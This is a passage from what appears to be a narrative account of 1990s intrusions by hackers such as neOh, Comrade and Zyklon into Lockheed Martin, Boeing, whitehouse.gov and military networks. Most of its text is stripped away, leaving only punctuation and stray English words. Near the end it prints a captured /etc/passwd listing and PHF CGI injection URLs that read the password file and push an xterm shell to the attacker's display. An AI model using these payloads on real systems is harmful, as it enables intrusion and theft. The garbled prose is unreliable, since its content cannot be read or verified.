1998 Comrade , RahulB. ( Rama3456). , .gov .mil, Comrade. , . 11 2001 ., .
Comrade , . ( IRC) . , , .
neOh, .
‑ 1999 , . , .
9 ? . , , . , . , , . , , , , . , , .
, , . neOh , neOh MIT . , neOh , : , ? , ?
, neOh . IRC, gLobaLheLL, ‑ . . , neOh , , . , .
|
|
neOh , sniffing ( , . sniffer . ). , , , , . , . , , . , . . , , .
213, , , , . , , , .
. , : , . ; , , , neOh , . , neOh. , , .
neOh , , , , . BhaBha . Sun Microsystems, . neOh , , , . , .
. neOh . . ? ! . : , neOh . ? .
, . , . , , , .
, . ? ? ? .
neOh, IRC‑ . Comrade , .
, , . , , , . IRC, , .
|
|
, , Chameleon ( , ). wired.com[1] , neOh Comrade. IRC, , DEM. , , . : DEM Defense Information Systems Network Equipment Manager. Masters of Downloading ( ) , , . , , . , ‑ , , . .
, , neOh. , , . ‑ , , . neOh , .
neOh Lockheed Martin , Boeing. neOh Lockheed , ( D M Z ). , , , .
. : .
. . , . : Lockheed Martin. Boeing.
neOh , Boeing , . , Boeing, . , . . , .
Boeing 747 . ?! (NeOh ).
. , . , !
4000 . Boeing , . : , , . , . ; , . CD Boeing‑747 eBay , . , . , , , , .
|
|
: SIPRNet
Comrade . , SIPRNet.
. S I P R N e t. SIPRNet.
. SIPRNet DISN, Defense Information System Network ( ), . SIPRNet Secret Internet Protocol Router Network ( ‑ ) .
neOh SIPRNet:
. . SIPRNet, . .
Comrade , . , 10 000 Comrade, , neOh, Comrade , , .
S I P R N e t. D I S A (Defense Information Security Agency ). , , Unix‑ ; , , .
, Comrade , . DISA SIPRNET. .
, .
.
1999 neOh Comrade . IC‑814 ‑ 178 11 . , , , , .
, Airbus A300 , , , , , . , .
(), . . . , , 11 ‑.
neOh, .
|
|
. . , .
: , .
, . , , . Wired.com , , IRC , . , : , ‑ ?. : , . . .[2]
COMRADE
, . Comrade , SIPRNet, . . Comrade :
. ‑, . , ns3.gtra.mil , . . , , , .
, : , . , , : , . .
Comrade, , , , . , . : , . ? . , : , , . , . , , .
Comrade . , , . Comrade : PGP‑ . , , .
Comrade . , . , , .
( , , , . Comrade , ; . : Comrade , , ).
, , . , . : , , , ".
Comrade ( ). Comrade ; , , , , , , .
|
|
, . , . . Comrade ‑ ‑. , ‑ . , .
; , , ; , Comrade, , , , . , .
, Comrade , . , neOh. neOh , . , . , , Comrade. neOh . , .
, , ? , , , ? , , , : , , , , , . Comrade , , . . neOh, , ‑ . , . ( , , , , . , , ? , Comrade ).
neOh, , . , . , . , , , , .
SavecOre, IRC , , MilwOrm. , , , SavecOre . . , .
, , SavecOre , . ‑ , SavecOre : , , , .
, . , , . , , , . neOh .
Chameleon ‑ ‑ . , Chameleon , Wired ( 4 1998 .). , . Chameleon . . , . 11 , , , . Chameleon , , , .
, , , , , . , , . , Chameleon , .
Chameleon, . . ( . , ). , , .
‑ ͻ
IRC‑, , , ‑[3]. ‑ , , 1997 .
1998 ‑‑[4].
. : , 23 2001 22 , . ‑ , 1995 [5].
36 , . , .
, . , , .
, ‑ , 2002 , , , ‑[6]. , , ().
11 (9/11)
. , , , , , . , , , , , , . .
, neOh 9/11. :
, ? , .
? .
, ‑ . Lockheed Martin Boing , . , .
, . , , !
, .
, . , , ‑ ‑? , 9/11 , . , .
. , . , , . (, , , ).
, , . Windows . , .
, , , , , , .
, , ‑ . .
‑ , . : , , , . neOh , 1999 gLobaLheLL . . . ‑‑ Zyklon MostFearD , , ‑. , .
. , . gLobaLheLL , , . : ! !. . , .
MostFearD Zyklon . . . .
neOh , , 7.
neOh , ‑.
root:x:0:l:Super‑User:/:/sbin/sh
daemon:x:l:l::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4: Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
bing:x: 1001:10:Bing F e r a r e n: / u s r / u s e r s / b i n g: / b i n / s h
orion:x: 1002:10:Christopher
Adams:/usr/users/orion:/usr/ace/sdshell
webadm:x:1130:101:Web
Administrator:/usr/users/webadm:/bin/sh
cadams:x:1003:10:Christopher
Adams:/usr/users/cadams:/usr/ace/sdsbell
barth om:x:1004:101:Mark
. , . . , Financial Times, , . Associated Press. ; . , .
Bartholomew:/usr/users/barth om:/usr/ace/sdshell
monty:x:1139:101:Monty
Haymes:/usr/users/monty:/bin/sh
debra:x:1148:101:debra
Reid:/usr/users/debra:/bin/sh
connie:x:1149:101:Connie
Colabastistto:/usr/users/connie:/bin/sh bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
Unix Linux, . , . sdshell . RSA Secure ID, , . , , PIN‑ ( ). , , , neOh, 8. gLobaLheLL Hong Kong Danger Duo. neOh, , .
http://www.attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mirror.html
neOh, , , , ‑. , , neOh, , . , , , : , , . ?
, . .
Zyklon, , . gLobaLheLL, , IRC . , , , PHF, . , , , Zyklon.
( ), whitehouse.gov , . Zyklon , , , .
Zyklon , . , , , . , , Zyklon ‑ . , ‑ , Zyklon.
, Zyklon, , , , . ? ? , Zyklon . , , , , .
, , . gLobaLheLL, . Zyklon (19 , ), MostHateD ( , 19 , ), MindPhasr ( , ) .
neOh , . , . : , , . . , . fbi.gov . . , , , , , ? . , , . ? !
: neOh, .
, ? Zyklon . , , gLobaLHeLL . Zyklon, , ‑, .
Zyklon, . , , . : .
. Zyklon , ? , , ? : , : , , . , , .
, ‑ , .
. ?
, , a Zyklon . .
Comrade ‑, . , , , , , , , , ‑ .
. , . , . , .
. , , . , . ‑ , . , RC Cola: , . , , . , , : , .
, . . , , . , , , .
, Comrade . , . .
Comrade neOh ( ), ‑, ‑ , , . , , , .
, , neOh , , . , , , . , .
. ?
, ? , . : , . , , , , . , .
?
. , , , , ( ). .
, . . , . . , , , . , neOh .
, . , , .
1997 2003 . (Operation Eligible Receiver) , , , Washington Times 10 , , . , red team ( , : , . red team , , , , , , . . ..) . . , ‑ , , .
, . . Christian Science Monitor, ( ) ‑ 11.
, . , Pacific Bell, Sprint, GTE . , , .
‑ . , 9/11 .
‑ ‑ , . , . , ‑ , , , , , , , ‑ . , .
. , , , . , neOh .
, , .
neOh , Lockheed Martin. , ( , ), .
, Lockheed Martin (DNS Domain Name Server). DNS ‑, , , www.disney.com 198.187.189.55 , . neOh , , exploit ( ) , DNS, Lockheed.
DNS‑ BIND (Berkeley Internet Name Domain). . BIND ( ) Lockheed Martin. , neOh Lockheed.
neOh , , . ; , . , neOh, , o var/adm/. .
; .
Lockheed Martin , neOh , ,
, Zyklon, CGI‑. CGI‑. , ‑ , PHF‑, , PHF ( ).
PHF , . escap eshell cmd(), . . , () . , .
Zyklon :
http://www.whitehouse.gov/cgi‑ bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
white‑house.gov. . , ‑ , whitehouse.gov. PHF‑. : http://www.whitehouse.gov/cgi‑ bin/phf?Qalias=x%Oaa/usr/X11R6/bin/xterm%20‑ut%20‑display%20zyklons.ip.adress:0.0
xterm , X. , , whitehouse.gov, . ( , ).
ufsrestore. Zyklon, whitehouse.gov, .
neOh Comrade .
: . , . . ‑ , , .
, , ‑ . ‑, ( ), . , .
, . , , .
‑. .
, neOh, , , , , ‑. .
, , , . ?
, . , ‑ . , . , , D M Z, . DMZ , , (‑, , DNS‑ ..) . .
‑ , .
. , , , , , , , log‑ .
, , .
, . , . , ‑ , .
, , . RSA Secure ID, . Safeword Premier Access (tokens) , , ‑, .
, , . , . , , . , ?
, , , , . .
. . , , : . , .
, , . . . , 48% , . , .
‑ , , .
3.